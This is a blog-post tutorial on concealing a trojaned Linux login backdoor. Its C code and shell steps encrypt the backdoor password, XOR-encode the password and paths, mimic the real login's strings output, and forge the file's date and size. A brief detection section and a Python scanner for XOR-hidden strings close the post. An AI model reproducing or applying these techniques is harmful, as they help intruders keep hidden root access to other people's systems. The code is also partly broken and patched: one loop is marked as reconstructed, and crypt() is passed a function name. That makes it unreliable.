Tuesday, December 14, 2010

Hacker techniques, advanced skills and practice: Linux backdoors

Encrypting the backdoor password with the DES algorithm

1. Using the crypt() function, write the program gen.c:

    #include <stdio.h>
    #include <stdlib.h>
    #include <crypt.h>   /* crypt(); link with -lcrypt */

    int main(int argc, char *argv[])
    {
        if (argc != 3) {
            printf("usage: %s\n", argv[0]);
            exit(1);
        }
        /* argv[1] is the password, argv[2] is the salt */
        printf("%s\n", crypt(argv[1], argv[2]));
        return 0;
    }

2. Compile gen and run it; ./gen hack Ui gives the result UiVqMWvDrIQjA.

3. Modify the backdoor source code ulogin.c: put the encrypted form of the password in place of the value of the PASSWORD macro defined in ulogin.c. If the backdoor password matches, go straight to a shell:

    if (!strcmp(PASSWORD, crypt(display, PASSWORD))) {
        system(SHELL);
        exit(1);
    }

With this change the strings command shows only the encrypted password.

Hiding strings with exclusive-or (XOR)

XOR a string with a key and write the result in hexadecimal, so that it is no longer printable.

1. The encoding program encode.c:

    #include <stdio.h>
    #include <string.h>

    char magic[] = "\x71\x67\x6d\x7a\x65\x61\x7a";

    /* XOR str in place with key, repeating the key as needed */
    char *de(char *str, char *key)
    {
        int i = 0, j = 0, len;

        len = strlen(key);
        while (str[i] != '\0') {
            str[i] ^= key[j];
            j++;
            if (j == len)
                j = 0;
            i++;
        }
        return str;
    }

    /* The loop body was lost in extraction; it is reconstructed here to
       match the \x.. output format shown in step 2. */
    void display(char *str)
    {
        int i;

        for (i = 0; i < (int)strlen(str); i++)
            printf("\\x%x", (unsigned char)str[i]);
        printf("\n");
    }

    int main(void)
    {
        char buf[100], *ptr;

        ptr = buf;
        scanf("%99s", ptr);
        de(ptr, magic);
        display(ptr);
        return 0;
    }

2. Compile encode and run it to get the XOR of each key string with the magic string. For example, the file name of the original login, /sbin/xlogin, becomes \x5e\x14\xf\x13\xb\x4e\x2\x1d\x8\xa\x13\xb after the XOR, so in the backdoor source code it is defined as:

    char login[] = "\x5e\x14\xf\x13\xb\x4e\x2\x1d\x8\xa\x13\xb";

Then insert the XOR function char *de() into the backdoor. With the same magic string, it works out the correct backdoor password and path. The strings command no longer shows the password or the path string.

Finally, make the strings output of the backdoor ulogin resemble the strings output of the normal login. To do this, add a string array to the code in ulogin.c:

    char strings[] = "";

and fill the quotation marks with the strings output of the normal login program. The fake then passes for the real thing, which makes it more deceptive.

Adjusting the backdoor's file date, size, and other properties

1. Date

    # ls -l /sbin/xlogin
    -r-sr-xr-x root root 19300 Feb 11 1998 /sbin/xlogin
    # touch -t 199802110000 ulogin
    # _

2. Size

    # ls -l ulogin /sbin/xlogin
    -r-sr-xr-x root root 7542 Feb 11 1998 ulogin
    -r-sr-xr-x root root 19300 Feb 11 1998 /sbin/xlogin
    # bc
    19300-7542
    11758
    # dd if=/sbin/xlogin of=/tmp/t bs=11758 count=1
    1+0 records in
    1+0 records out
    11758 bytes transferred in 0.000379 secs (31016746 bytes/sec)
    # cat /tmp/t >> ulogin

Detecting the login backdoor

Run md5sum on the existing /bin/login file and compare the result with the previously recorded value. On Red Hat Linux, use the RPM checksum:

    # rpm -V util-linux

When an intruder has logged in through the backdoor, the who command does not show the user. Look at the system processes and find login -h xxx.xxx.xxx.xxx.
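Because strings does not show an XOR-encoded path, a defender examining a suspect binary can instead search for a known path stored under a short repeating key. The Python sketch below is an added example, not code from the original post: the function names, thresholds and sample blob are constructed for illustration, while the encoded bytes and the path are the ones quoted above.

```python
from itertools import cycle

# Values quoted on the page: the XOR-encoded path and its cleartext.
ENCODED = bytes.fromhex("5e140f130b4e021d080a130b")
KNOWN_PATH = b"/sbin/xlogin"

# Constructed sample blob (not a real binary): header, padding,
# the encoded path, more padding, and one ordinary cleartext string.
SAMPLE = b"\x7fELF" + bytes(12) + ENCODED + bytes(12) + b"/bin/sh\x00"


def xor_repeat(data, key):
    """XOR data with key, repeating the key as needed."""
    return bytes(d ^ k for d, k in zip(data, cycle(key)))


def find_xor_hidden(data, plaintext, max_key_len=8, min_repeat=4):
    """Return [(offset, key)] where plaintext sits XORed with a repeating key.

    At each offset the candidate keystream is data XOR plaintext. A real hit
    is a keystream that repeats with a period shorter than the plaintext.
    min_repeat is how many keystream bytes must repeat before a match counts,
    which keeps chance matches out.
    """
    n = len(plaintext)
    hits = []
    for off in range(len(data) - n + 1):
        stream = bytes(d ^ p for d, p in zip(data[off:off + n], plaintext))
        if not any(stream):
            continue  # stored in clear; strings already reports it
        for klen in range(1, min(max_key_len, n - min_repeat) + 1):
            if all(stream[i] == stream[i - klen] for i in range(klen, n)):
                hits.append((off, stream[:klen]))  # shortest period wins
                break
    return hits


if __name__ == "__main__":
    for off, key in find_xor_hidden(SAMPLE, KNOWN_PATH):
        window = SAMPLE[off:off + len(KNOWN_PATH)]
        print(f"offset {off}: key {key!r} -> {xor_repeat(window, key)!r}")
```

A path that is short relative to the key leaves too few repeated keystream bytes to be conclusive, so min_repeat trades recall against false positives.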
